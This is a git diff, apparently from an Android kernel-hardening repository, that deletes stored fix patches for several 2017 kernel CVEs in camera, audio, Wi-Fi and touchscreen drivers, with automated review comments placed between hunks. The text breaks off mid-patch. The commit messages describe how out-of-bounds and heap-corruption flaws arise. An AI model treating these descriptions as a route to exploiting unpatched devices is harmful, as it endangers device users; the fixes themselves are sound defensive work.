index 67cf9630..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0631/ANY/0001.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From 8236d6ebc7e26361ca7078cbeba01509f10941d8 Mon Sep 17 00:00:00 2001
-From: Rajesh Bondugula
-Date: Tue, 22 Nov 2016 11:04:04 -0800
-Subject: msm: camera: flash: Validate the power setting size
-
-Validate the power setting size before copying.
-If userspace sends a value which is greater than
-MAX_POWER_CONFIG, then the driver accesses unintended memory.
-This change will fix the issue.
-
-CRs-Fixed: 1093232
-Signed-off-by: Rajesh Bondugula
-Change-Id: Ia49963248a94765baa19695294b197ea6f3bb8e2
----
- drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c | 10 ++++++++++
- 1 file changed, 10 insertions(+)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c b/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-index 5f749bd..6c8826b 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/flash/msm_flash.c
-@@ -269,6 +269,16 @@ static int32_t msm_flash_i2c_init(
- flash_ctrl->power_info.power_down_setting_size =
- flash_ctrl->power_setting_array.size_down;
-
-+ if ((flash_ctrl->power_info.power_setting_size > MAX_POWER_CONFIG) ||
-+ (flash_ctrl->power_info.power_down_setting_size > MAX_POWER_CONFIG)) {
-+ pr_err("%s:%d invalid power setting size=%d size_down=%d\n",
-+ __func__, __LINE__,
-+ flash_ctrl->power_info.power_setting_size,
-+ flash_ctrl->power_info.power_down_setting_size);
-+ rc = -EINVAL;
-+ goto msm_flash_i2c_init_fail;
-+ }
-+
- rc = msm_camera_power_up(&flash_ctrl->power_info,
- flash_ctrl->flash_device_type,
- &flash_ctrl->flash_i2c_client);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0632/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0632/ANY/0001.patch
deleted file mode 100644
index e2e26330..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0632/ANY/0001.patch
+++ /dev/null
@@ -1,85 +0,0 @@ -From 970d6933e53c1f7ca8c8b67f49147b18505c3b8f Mon Sep 17 00:00:00 2001 -From: Aravind Kumar -Date: Mon, 11 May 2015 18:19:11 +0530 -Subject: ASoC: msm8x16-wcd: prevent out of bounds access - -Hardcoding the third argument in strnstr function -is resulting in out of bounds access. Set the third argument -to sizeof the character string passed as the first argument -to prevent out of bounds access. - -CRs-Fixed: 832915 -Change-Id: I61be88701340e271fd866e0e1801722dbe7d63ac -Signed-off-by: Aravind Kumar ---- - sound/soc/codecs/msm8x16-wcd.c | 24 ++++++++++++------------ - 1 file changed, 12 insertions(+), 12 deletions(-) - -diff --git a/sound/soc/codecs/msm8x16-wcd.c b/sound/soc/codecs/msm8x16-wcd.c -index 296f7d3..9a193c67 100644 ---- a/sound/soc/codecs/msm8x16-wcd.c -+++ b/sound/soc/codecs/msm8x16-wcd.c -@@ -2603,19 +2603,19 @@ static int msm8x16_wcd_codec_enable_micbias(struct snd_soc_dapm_widget *w, - micbias2 = (snd_soc_read(codec, MSM8X16_WCD_A_ANALOG_MICB_2_EN) & 0x80); - switch (event) { - case SND_SOC_DAPM_PRE_PMU: -- if (strnstr(w->name, internal1_text, 30)) { -+ if (strnstr(w->name, internal1_text, strlen(w->name))) { - if (get_codec_version(msm8x16_wcd) == CAJON) - snd_soc_update_bits(codec, - MSM8X16_WCD_A_ANALOG_TX_1_2_ATEST_CTL_2, - 0x02, 0x02); - snd_soc_update_bits(codec, micb_int_reg, 0x80, 0x80); -- } else if (strnstr(w->name, internal2_text, 30)) { -+ } else if (strnstr(w->name, internal2_text, strlen(w->name))) { - snd_soc_update_bits(codec, micb_int_reg, 0x10, 0x10); - snd_soc_update_bits(codec, w->reg, 0x60, 0x00); -- } else if (strnstr(w->name, internal3_text, 30)) { -+ } else if (strnstr(w->name, internal3_text, strlen(w->name))) { - snd_soc_update_bits(codec, micb_int_reg, 0x2, 0x2); - } -- if (!strnstr(w->name, external_text, 30)) -+ if (!strnstr(w->name, external_text, strlen(w->name))) - snd_soc_update_bits(codec, - MSM8X16_WCD_A_ANALOG_MICB_1_EN, 0x05, 0x04); - if (w->reg == MSM8X16_WCD_A_ANALOG_MICB_1_EN) -@@ -2624,28 
+2624,28 @@ static int msm8x16_wcd_codec_enable_micbias(struct snd_soc_dapm_widget *w, - break; - case SND_SOC_DAPM_POST_PMU: - usleep_range(20000, 20100); -- if (strnstr(w->name, internal1_text, 30)) { -+ if (strnstr(w->name, internal1_text, strlen(w->name))) { - snd_soc_update_bits(codec, micb_int_reg, 0x40, 0x40); -- } else if (strnstr(w->name, internal2_text, 30)) { -+ } else if (strnstr(w->name, internal2_text, strlen(w->name))) { - snd_soc_update_bits(codec, micb_int_reg, 0x08, 0x08); - msm8x16_notifier_call(codec, - WCD_EVENT_PRE_MICBIAS_2_ON); -- } else if (strnstr(w->name, internal3_text, 30)) { -+ } else if (strnstr(w->name, internal3_text, strlen(w->name))) { - snd_soc_update_bits(codec, micb_int_reg, 0x01, 0x01); -- } else if (strnstr(w->name, external2_text, 30)) { -+ } else if (strnstr(w->name, external2_text, strlen(w->name))) { - msm8x16_notifier_call(codec, - WCD_EVENT_PRE_MICBIAS_2_ON); - } - break; - case SND_SOC_DAPM_POST_PMD: -- if (strnstr(w->name, internal1_text, 30)) { -+ if (strnstr(w->name, internal1_text, strlen(w->name))) { - snd_soc_update_bits(codec, micb_int_reg, 0xC0, 0x40); -- } else if (strnstr(w->name, internal2_text, 30)) { -+ } else if (strnstr(w->name, internal2_text, strlen(w->name))) { - msm8x16_notifier_call(codec, - WCD_EVENT_PRE_MICBIAS_2_OFF); -- } else if (strnstr(w->name, internal3_text, 30)) { -+ } else if (strnstr(w->name, internal3_text, strlen(w->name))) { - snd_soc_update_bits(codec, micb_int_reg, 0x2, 0x0); -- } else if (strnstr(w->name, external2_text, 30)) { -+ } else if (strnstr(w->name, external2_text, strlen(w->name))) { - /* - * send micbias turn off event to mbhc driver and then - * break, as no need to set MICB_1_EN register. --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0633/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0633/ANY/0001.patch deleted file mode 100644 index 2a04b066..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0633/ANY/0001.patch +++ /dev/null 
@@ -1,128 +0,0 @@ -From 4e38c573e81eb76f09bae425f035be392fbab370 Mon Sep 17 00:00:00 2001 -From: Insun Song -Date: Fri, 24 Mar 2017 14:04:03 -0700 -Subject: [PATCH] net: wireless: bcmdhd: fix for IOVAR GET failed - -found some case that IOVAR callers set response buffer not enough to -contain input command string + argument. so it finally fail in IOVAR -transaction by its shorter buffer length. - -proposed fix is taking care this case by providing enough local -buffer inside dhd_iovar, which enough to input/output. - -Signed-off-by: Insun Song -Bug: 36000515 -Change-Id: I0afedcc29b05b12f42ebc619e6feeaa868fc00de ---- - drivers/net/wireless/bcmdhd/dhd_linux.c | 81 ++++++++++++++++++++++++--------- - 1 file changed, 59 insertions(+), 22 deletions(-) - -diff --git a/drivers/net/wireless/bcmdhd/dhd_linux.c b/drivers/net/wireless/bcmdhd/dhd_linux.c -index 17e503c6d6b35..0b66e914c15a0 100644 ---- a/drivers/net/wireless/bcmdhd/dhd_linux.c -+++ b/drivers/net/wireless/bcmdhd/dhd_linux.c -@@ -6257,45 +6257,82 @@ dhd_iovar(dhd_pub_t *pub, int ifidx, char *name, char *param_buf, - return BCME_BADARG; - - input_len = strlen(name) + 1 + param_len; -+ if (input_len > WLC_IOCTL_MAXLEN) -+ return BCME_BADARG; -+ buf = NULL; - if (set) { - if (res_buf || res_len != 0) { - DHD_ERROR(("%s: SET wrong arguemnet\n", __FUNCTION__)); - return BCME_BADARG; - } -- buf = kzalloc(input_len, GFP_ATOMIC); -+ buf = kzalloc(input_len, GFP_KERNEL); - if (!buf) { - DHD_ERROR(("%s: mem alloc failed\n", __FUNCTION__)); - return BCME_NOMEM; - } - ret = bcm_mkiovar(name, param_buf, param_len, buf, input_len); -+ if (!ret) { -+ ret = BCME_NOMEM; -+ goto exit; -+ } -+ -+ ioc.cmd = WLC_SET_VAR; -+ ioc.buf = buf; -+ ioc.len = input_len; -+ ioc.set = set; -+ -+ ret = dhd_wl_ioctl(pub, ifidx, &ioc, ioc.buf, ioc.len); -+ - } else { -- if (!res_buf) { -- DHD_ERROR(("%s: GET failed. resp_buf NULL\n", -+ if (!res_buf || res_len == 0) { -+ DHD_ERROR(("%s: GET failed. 
resp_buf NULL or len:0\n", - __FUNCTION__)); - return BCME_NOMEM; - } - if (res_len < input_len) { -- DHD_ERROR(("%s: res_len(%d) < input_len(%d)\n", -- __FUNCTION__, res_len, input_len)); -- return BCME_NOMEM; -- } -- memset(res_buf, 0, res_len); -- ret = bcm_mkiovar(name, param_buf, param_len, res_buf, res_len); -- } -- if (ret == 0) { -- if (set) -- kfree(buf); -- return BCME_NOMEM; -- } -+ DHD_INFO(("%s: res_len(%d) < input_len(%d)\n", -+ __FUNCTION__, res_len, input_len)); -+ buf = kzalloc(input_len, GFP_KERNEL); -+ if (!buf) { -+ DHD_ERROR(("%s: mem alloc failed\n", -+ __FUNCTION__)); -+ return BCME_NOMEM; -+ } -+ ret = bcm_mkiovar(name, param_buf, param_len, buf, -+ input_len); -+ if (!ret) { -+ ret = BCME_NOMEM; -+ goto exit; -+ } - -- ioc.cmd = set ? WLC_SET_VAR : WLC_GET_VAR; -- ioc.buf = set ? buf : res_buf; -- ioc.len = set ? ret : res_len; -- ioc.set = set; -+ ioc.cmd = WLC_GET_VAR; -+ ioc.buf = buf; -+ ioc.len = input_len; -+ ioc.set = set; - -- ret = dhd_wl_ioctl(pub, ifidx, &ioc, ioc.buf, ioc.len); -- if (set) -- kfree(buf); -+ ret = dhd_wl_ioctl(pub, ifidx, &ioc, ioc.buf, ioc.len); -+ -+ if (ret == BCME_OK) -+ memcpy(res_buf, buf, res_len); -+ } else { -+ memset(res_buf, 0, res_len); -+ ret = bcm_mkiovar(name, param_buf, param_len, res_buf, -+ res_len); -+ if (!ret) { -+ ret = BCME_NOMEM; -+ goto exit; -+ } -+ -+ ioc.cmd = WLC_GET_VAR; -+ ioc.buf = res_buf; -+ ioc.len = res_len; -+ ioc.set = set; -+ -+ ret = dhd_wl_ioctl(pub, ifidx, &ioc, ioc.buf, ioc.len); -+ } -+ } -+exit: -+ kfree(buf); - return ret; - } - diff --git a/Patches/Linux_CVEs/CVE-2017-0648/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0648/ANY/0001.patch deleted file mode 100644 index 24a62aed..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0648/ANY/0001.patch +++ /dev/null 
@@ -1,13 +0,0 @@
-diff --git a/include/linux/sysrq.h b/include/linux/sysrq.h
-index 5a0bd93..d393eeb 100644
---- a/include/linux/sysrq.h
-+++ b/include/linux/sysrq.h
-@@ -18,7 +18,7 @@
- #include
-
- /* Enable/disable SYSRQ support by default (0==no, 1==yes). */
--#define SYSRQ_DEFAULT_ENABLE 1
-+#define SYSRQ_DEFAULT_ENABLE 0
-
- /* Possible values of bitmask for enabling sysrq functions */
- /* 0x0001 is reserved for enable everything */
diff --git a/Patches/Linux_CVEs/CVE-2017-0648/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-0648/ANY/0001.patch.base64
deleted file mode 100644
index 9daf348f..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0648/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2017-0650/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0650/ANY/0001.patch
deleted file mode 100644
index e2c32ab0..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0650/ANY/0001.patch
+++ /dev/null
@@ -1,154 +0,0 @@ -From c6d874fd2c515406bc33ab78d60df70a47bddae2 Mon Sep 17 00:00:00 2001 -From: Andrew Chant -Date: Fri, 7 Apr 2017 10:42:31 -0700 -Subject: [PATCH] input: synaptics_dsx: valid bounds of intr_reg_num - -Validate the intr_reg_num value returned by touchscreen -to ensure no out of bounds access can occur. - -Bug: 35472278 -Change-Id: If98e7091bf938061ac1b473ec652a620f118dbf0 -Signed-off-by: Andrew Chant ---- - .../synaptics_dsx_htc_2.6/synaptics_dsx_core.c | 50 ++++++++++++++++------ - 1 file changed, 38 insertions(+), 12 deletions(-) - -diff --git a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_core.c b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_core.c -index 90b6fc37284b7..dbe242808841b 100644 ---- a/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_core.c -+++ b/drivers/input/touchscreen/synaptics_dsx_htc_2.6/synaptics_dsx_core.c -@@ -2460,14 +2460,20 @@ static int synaptics_rmi4_irq_enable(struct synaptics_rmi4_data *rmi4_data, - return retval; - } - --static void synaptics_rmi4_set_intr_mask(struct synaptics_rmi4_fn *fhandler, -- struct synaptics_rmi4_fn_desc *fd, -- unsigned int intr_count) -+static int synaptics_rmi4_set_intr_mask(struct synaptics_rmi4_fn *fhandler, -+ struct synaptics_rmi4_fn_desc *fd, -+ unsigned int intr_count) - { - unsigned char ii; - unsigned char intr_offset; - - fhandler->intr_reg_num = (intr_count + 7) / 8; -+ if (fhandler->intr_reg_num >= MAX_INTR_REGISTERS) { -+ fhandler->intr_reg_num = 0; -+ fhandler->num_of_data_sources = 0; -+ fhandler->intr_mask = 0; -+ return -EINVAL; -+ } - if (fhandler->intr_reg_num != 0) - fhandler->intr_reg_num -= 1; - -@@ -2479,7 +2485,7 @@ static void synaptics_rmi4_set_intr_mask(struct synaptics_rmi4_fn *fhandler, - ii++) - fhandler->intr_mask |= 1 << ii; - -- return; -+ return 0; - } - - static int synaptics_rmi4_f01_init(struct synaptics_rmi4_data *rmi4_data, -@@ -2487,12 +2493,16 @@ static int synaptics_rmi4_f01_init(struct 
synaptics_rmi4_data *rmi4_data, - struct synaptics_rmi4_fn_desc *fd, - unsigned int intr_count) - { -+ int retval; -+ - fhandler->fn_number = fd->fn_number; - fhandler->num_of_data_sources = fd->intr_src_count; - fhandler->data = NULL; - fhandler->extra = NULL; - -- synaptics_rmi4_set_intr_mask(fhandler, fd, intr_count); -+ retval = synaptics_rmi4_set_intr_mask(fhandler, fd, intr_count); -+ if (retval < 0) -+ return retval; - - rmi4_data->f01_query_base_addr = fd->query_base_addr; - rmi4_data->f01_ctrl_base_addr = fd->ctrl_base_addr; -@@ -2578,7 +2588,9 @@ static int synaptics_rmi4_f11_init(struct synaptics_rmi4_data *rmi4_data, - rmi4_data->sensor_max_y = temp; - } - -- synaptics_rmi4_set_intr_mask(fhandler, fd, intr_count); -+ retval = synaptics_rmi4_set_intr_mask(fhandler, fd, intr_count); -+ if (retval < 0) -+ return retval; - - fhandler->data = NULL; - -@@ -3362,7 +3374,9 @@ static int synaptics_rmi4_f12_init(struct synaptics_rmi4_data *rmi4_data, - return retval; - } - -- synaptics_rmi4_set_intr_mask(fhandler, fd, intr_count); -+ retval = synaptics_rmi4_set_intr_mask(fhandler, fd, intr_count); -+ if (retval < 0) -+ return retval; - - /* Allocate memory for finger data storage space */ - fhandler->data_size = num_of_fingers * size_of_2d_data; -@@ -3569,7 +3583,9 @@ static int synaptics_rmi4_f1a_init(struct synaptics_rmi4_data *rmi4_data, - fhandler->fn_number = fd->fn_number; - fhandler->num_of_data_sources = fd->intr_src_count; - -- synaptics_rmi4_set_intr_mask(fhandler, fd, intr_count); -+ retval = synaptics_rmi4_set_intr_mask(fhandler, fd, intr_count); -+ if (retval < 0) -+ return retval; - - retval = synaptics_rmi4_f1a_alloc_mem(rmi4_data, fhandler); - if (retval < 0) -@@ -3596,12 +3612,16 @@ static int synaptics_rmi4_f34_init(struct synaptics_rmi4_data *rmi4_data, - unsigned int intr_count, - unsigned int page_number) - { -+ int retval; -+ - fhandler->fn_number = fd->fn_number; - fhandler->num_of_data_sources = fd->intr_src_count; - fhandler->data = NULL; 
- fhandler->extra = NULL; - -- synaptics_rmi4_set_intr_mask(fhandler, fd, intr_count); -+ retval = synaptics_rmi4_set_intr_mask(fhandler, fd, intr_count); -+ if (retval < 0) -+ return retval; - - rmi4_data->f34_query_base_addr = - (fd->query_base_addr | (page_number << 8)); -@@ -3634,7 +3654,9 @@ static int synaptics_rmi4_f54_init(struct synaptics_rmi4_data *rmi4_data, - fhandler->data = NULL; - fhandler->extra = NULL; - -- synaptics_rmi4_set_intr_mask(fhandler, fd, intr_count); -+ retval = synaptics_rmi4_set_intr_mask(fhandler, fd, intr_count); -+ if (retval < 0) -+ return retval; - - rmi4_data->f54_query_base_addr = - (fd->query_base_addr | (page_number << 8)); -@@ -4127,8 +4149,10 @@ static int synaptics_rmi4_query_device(struct synaptics_rmi4_data *rmi4_data) - fhandler->fn_number = rmi_fd.fn_number; - fhandler->num_of_data_sources = - rmi_fd.intr_src_count; -- synaptics_rmi4_set_intr_mask(fhandler, &rmi_fd, -- intr_count); -+ retval = synaptics_rmi4_set_intr_mask( -+ fhandler, &rmi_fd, intr_count); -+ if (retval < 0) -+ return retval; - #endif - - #ifdef F51_DISCRETE_FORCE -@@ -4171,6 +4195,8 @@ static int synaptics_rmi4_query_device(struct synaptics_rmi4_data *rmi4_data) - dev_dbg(rmi4_data->pdev->dev.parent, - "%s: Number of interrupt registers = %d\n", - __func__, rmi4_data->num_of_intr_regs); -+ if (rmi4_data->num_of_intr_regs > MAX_INTR_REGISTERS) -+ return -EINVAL; - - f01_query = kmalloc(F01_STD_QUERY_LEN, GFP_KERNEL); - if (!f01_query) { diff --git a/Patches/Linux_CVEs/CVE-2017-0651/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0651/ANY/0001.patch deleted file mode 100644 index 52fd8ec8..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0651/ANY/0001.patch +++ /dev/null 
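Review bot: In synaptics_rmi4_set_intr_mask the new bound is tested on `fhandler->intr_reg_num` only after `(intr_count + 7) / 8` has been stored there. If that field is narrower than `unsigned int` (its declaration is not in the hunk), a large count reported by the touchscreen is truncated before the comparison. Computing into a local first, `unsigned int regs = (intr_count + 7) / 8;`, and testing `regs >= MAX_INTR_REGISTERS` before assigning would make the check independent of the field width. The check added in synaptics_rmi4_query_device uses `>` against the same constant where this one uses `>=`; a one-line comment stating which of the two is the real array limit would remove the doubt. Both functions continue outside the hunks.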
@@ -1,26 +0,0 @@ -diff --git a/drivers/staging/android/ion/ion.c b/drivers/staging/android/ion/ion.c -index b4ef711..9a8000e 100644 ---- a/drivers/staging/android/ion/ion.c -+++ b/drivers/staging/android/ion/ion.c -@@ -871,6 +871,7 @@ - struct ion_device *dev = p->dev; - struct rb_node *n; - struct ion_debugfs_handle_header header; -+ struct ion_debugfs_handle_entry entry; - - header.version = 1; - /* -@@ -883,11 +884,12 @@ - if (seq_write(s, &header, sizeof(header))) - return 0; - -+ memset(&entry, 0, sizeof(entry)); -+ - mutex_lock(&dev->buffer_lock); - for (n = rb_first(&dev->buffers); n; n = rb_next(n)) { - struct ion_buffer *buffer = rb_entry(n, struct ion_buffer, - node); -- struct ion_debugfs_handle_entry entry; - - if (buffer->pid != p->pid) - continue; diff --git a/Patches/Linux_CVEs/CVE-2017-0651/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-0651/ANY/0001.patch.base64 deleted file mode 100644 index e2fc1695..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0651/ANY/0001.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-0705/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0705/ANY/0001.patch deleted file mode 100644 index 9b38b46d..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0705/ANY/0001.patch +++ /dev/null 
@@ -1,84 +0,0 @@ -From e58dd312d3d28331b2e28674c6a49f815a55d4bc Mon Sep 17 00:00:00 2001 -From: Insun Song -Date: Fri, 21 Apr 2017 14:38:21 -0700 -Subject: [PATCH] net: wireless: bcmdhd: adding boundary check in SWC gscan - config - -Since there's no boundary checking while looping NL structures, it could -corrupt kernel memory heap and leave room for security vulnerability -issue. -The proposed fix is adding a new NL attribute indicating how many SWC -bssids included. and it bounds NL iteration not to overwrite the -buffer. - -Signed-off-by: Insun Song -Bug: 34973477 -Change-Id: I03e079b6054b930487230ca313bb96a7f9e63e64 ---- - drivers/net/wireless/bcmdhd/wl_cfgvendor.c | 34 +++++++++++++++++++++++++++--- - 1 file changed, 31 insertions(+), 3 deletions(-) - -diff --git a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c -index 1f5152f66ab36..4e5fee09b5f33 100644 ---- a/drivers/net/wireless/bcmdhd/wl_cfgvendor.c -+++ b/drivers/net/wireless/bcmdhd/wl_cfgvendor.c -@@ -1168,11 +1168,15 @@ static int wl_cfgvendor_significant_change_cfg(struct wiphy *wiphy, - const struct nlattr *outer, *inner, *iter; - bool flush = FALSE; - wl_pfn_significant_bssid_t *pbssid; -+ uint16 num_bssid = 0; -+ uint16 max_buf_size = sizeof(gscan_swc_params_t) + -+ sizeof(wl_pfn_significant_bssid_t) * (PFN_SWC_MAX_NUM_APS - 1); -+ -+ significant_params = kzalloc(max_buf_size, GFP_KERNEL); - -- significant_params = (gscan_swc_params_t *) kzalloc(len, GFP_KERNEL); - if (!significant_params) { -- WL_ERR(("Cannot Malloc mem to parse config commands size - %d bytes \n", len)); -- return -1; -+ WL_ERR(("Cannot Malloc mem size:%d\n", len)); -+ return BCME_NOMEM; - } - - -@@ -1192,9 +1196,27 @@ static int wl_cfgvendor_significant_change_cfg(struct wiphy *wiphy, - case GSCAN_ATTRIBUTE_MIN_BREACHING: - significant_params->swc_threshold = nla_get_u16(iter); - break; -+ case GSCAN_ATTRIBUTE_NUM_BSSID: -+ num_bssid = nla_get_u16(iter); -+ if (num_bssid > 
PFN_SWC_MAX_NUM_APS) { -+ WL_ERR(("ovar max SWC bssids:%d\n", -+ num_bssid)); -+ err = BCME_BADARG; -+ goto exit; -+ } -+ break; - case GSCAN_ATTRIBUTE_SIGNIFICANT_CHANGE_BSSIDS: -+ if (num_bssid == 0) { -+ WL_ERR(("num_bssid : 0\n")); -+ err = BCME_BADARG; -+ goto exit; -+ } - pbssid = significant_params->bssid_elem_list; - nla_for_each_nested(outer, iter, tmp) { -+ if (j >= num_bssid) { -+ j++; -+ break; -+ } - nla_for_each_nested(inner, outer, tmp1) { - switch (nla_type(inner)) { - case GSCAN_ATTRIBUTE_BSSID: -@@ -1217,6 +1239,12 @@ static int wl_cfgvendor_significant_change_cfg(struct wiphy *wiphy, - break; - } - } -+ if (j != num_bssid) { -+ WL_ERR(("swc bssids count:%d not matched to num_bssid:%d\n", -+ j, num_bssid)); -+ err = BCME_BADARG; -+ goto exit; -+ } - significant_params->nbssid = j; - - if (dhd_dev_pno_set_cfg_gscan(bcmcfg_to_prmry_ndev(cfg), diff --git a/Patches/Linux_CVEs/CVE-2017-0706/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0706/ANY/0001.patch deleted file mode 100644 index f5da5679..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0706/ANY/0001.patch +++ /dev/null @@ -1,15 +0,0 @@ -diff --git a/drivers/net/wireless/bcmdhd/wl_cfg80211.c b/drivers/net/wireless/bcmdhd/wl_cfg80211.c -index 9081988..a73b030 100644 ---- a/drivers/net/wireless/bcmdhd/wl_cfg80211.c -+++ b/drivers/net/wireless/bcmdhd/wl_cfg80211.c -@@ -5830,6 +5830,10 @@ - - WL_DBG(("Enter \n")); - -+ if (len > (ACTION_FRAME_SIZE + DOT11_MGMT_HDR_LEN)) { -+ WL_ERR(("bad length:%zu\n", len)); -+ return BCME_BADARG; -+ } - dev = cfgdev_to_wlc_ndev(cfgdev, cfg); - - /* set bsscfg idx for iovar (wlan0: P2PAPI_BSSCFG_PRIMARY, p2p: P2PAPI_BSSCFG_DEVICE) */ diff --git a/Patches/Linux_CVEs/CVE-2017-0706/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-0706/ANY/0001.patch.base64 deleted file mode 100644 index ad2489f5..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0706/ANY/0001.patch.base64 +++ /dev/null 
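Review bot: The allocation-failure message in wl_cfgvendor_significant_change_cfg still prints `len` although the buffer is now sized by `max_buf_size`, so the logged size is not the one that failed; `WL_ERR(("Cannot Malloc mem size:%d\n", max_buf_size));` matches the new code. `max_buf_size` is declared `uint16` while it holds a `sizeof` product, which would truncate silently if the structures or PFN_SWC_MAX_NUM_APS grow, so a wider type with a matching format specifier is safer. The loop bound only works when GSCAN_ATTRIBUTE_NUM_BSSID arrives before GSCAN_ATTRIBUTE_SIGNIFICANT_CHANGE_BSSIDS; the other order is rejected through `num_bssid == 0`, and a comment such as `/* NUM_BSSID must precede the BSSID list */` would state that requirement. The function body continues outside the hunks.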
@@ -1 +0,0 @@ -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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-0710/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0710/ANY/0001.patch deleted file mode 100644 index b1a9e523..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0710/ANY/0001.patch +++ /dev/null @@ -1,14 +0,0 @@ -diff --git a/kernel/fork.c b/kernel/fork.c -index 2b11e38..b6eecda 100644 ---- a/kernel/fork.c -+++ b/kernel/fork.c -@@ -725,8 +725,7 @@ - - mm = get_task_mm(task); - if (mm && mm != current->mm && -- !ptrace_may_access(task, mode) && -- !capable(CAP_SYS_RESOURCE)) { -+ !ptrace_may_access(task, mode)) { - mmput(mm); - mm = ERR_PTR(-EACCES); - } diff --git a/Patches/Linux_CVEs/CVE-2017-0710/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-0710/ANY/0001.patch.base64 deleted file mode 100644 index 9f795347..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0710/ANY/0001.patch.base64 +++ /dev/null @@ -1 +0,0 @@ -ZGlmZiAtLWdpdCBhL2tlcm5lbC9mb3JrLmMgYi9rZXJuZWwvZm9yay5jCmluZGV4IDJiMTFlMzguLmI2ZWVjZGEgMTAwNjQ0Ci0tLSBhL2tlcm5lbC9mb3JrLmMKKysrIGIva2VybmVsL2ZvcmsuYwpAQCAtNzI1LDggKzcyNSw3IEBACiAKIAltbSA9IGdldF90YXNrX21tKHRhc2spOwogCWlmIChtbSAmJiBtbSAhPSBjdXJyZW50LT5tbSAmJgotCQkJIXB0cmFjZV9tYXlfYWNjZXNzKHRhc2ssIG1vZGUpICYmCi0JCQkhY2FwYWJsZShDQVBfU1lTX1JFU09VUkNFKSkgeworCQkJIXB0cmFjZV9tYXlfYWNjZXNzKHRhc2ssIG1vZGUpKSB7CiAJCW1tcHV0KG1tKTsKIAkJbW0gPSBFUlJfUFRSKC1FQUNDRVMpOwogCX0K \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-0740/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0740/ANY/0001.patch deleted file mode 100644 index a379087a..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0740/ANY/0001.patch +++ /dev/null 
@@ -1,110 +0,0 @@ -From e7fdc1ca00f1e589df8542af7e7acaaa87370625 Mon Sep 17 00:00:00 2001 -From: Insun Song -Date: Fri, 7 Apr 2017 16:27:49 -0700 -Subject: [PATCH] net: wireless: bcmdhd: additional length check for BRCM EVENT - frame. - -This is just for exceptional case where user has updated kernel to the -latest, but still used non-patched firmware. The non-patched firmware -could deliver ETHER_TYPE_BRCM packet to host. - -If attacker inject packet with its header length forged, it could bypass -current host driver's length check routine and cause memory corruption. - -Proposed fix is enhancing length check to validate its header length. - -Change-Id: I90fc5101bddfd1d427e0a52758ddf8bc16577555 -Bug: 37168488 -Signed-off-by: Insun Song ---- - drivers/net/wireless/bcmdhd/bcmevent.c | 27 ++++++++++++++-------- - drivers/net/wireless/bcmdhd/include/proto/bcmeth.h | 1 + - 2 files changed, 18 insertions(+), 10 deletions(-) - mode change 100755 => 100644 drivers/net/wireless/bcmdhd/include/proto/bcmeth.h - -diff --git a/drivers/net/wireless/bcmdhd/bcmevent.c b/drivers/net/wireless/bcmdhd/bcmevent.c -index b85f111bce180..7ed9739c0eddf 100644 ---- a/drivers/net/wireless/bcmdhd/bcmevent.c -+++ b/drivers/net/wireless/bcmdhd/bcmevent.c -@@ -209,12 +209,14 @@ int - is_wlc_event_frame(void *pktdata, uint pktlen, uint16 exp_usr_subtype, - bcm_event_msg_u_t *out_event) - { -- uint16 len; -+ uint16 evlen; - uint16 subtype; - uint16 usr_subtype; - bcm_event_t *bcm_event; - uint8 *pktend; -+ uint8 *evend; - int err = BCME_OK; -+ uint32 data_len; - - pktend = (uint8 *)pktdata + pktlen; - bcm_event = (bcm_event_t *)pktdata; -@@ -235,8 +237,9 @@ is_wlc_event_frame(void *pktdata, uint pktlen, uint16 exp_usr_subtype, - } - - /* check length in bcmeth_hdr */ -- len = ntoh16_ua((void *)&bcm_event->bcm_hdr.length); -- if (((uint8 *)&bcm_event->bcm_hdr.version + len) > pktend) { -+ evlen = ntoh16_ua((void *)&bcm_event->bcm_hdr.length); -+ evend = (uint8 *)&bcm_event->bcm_hdr.version + 
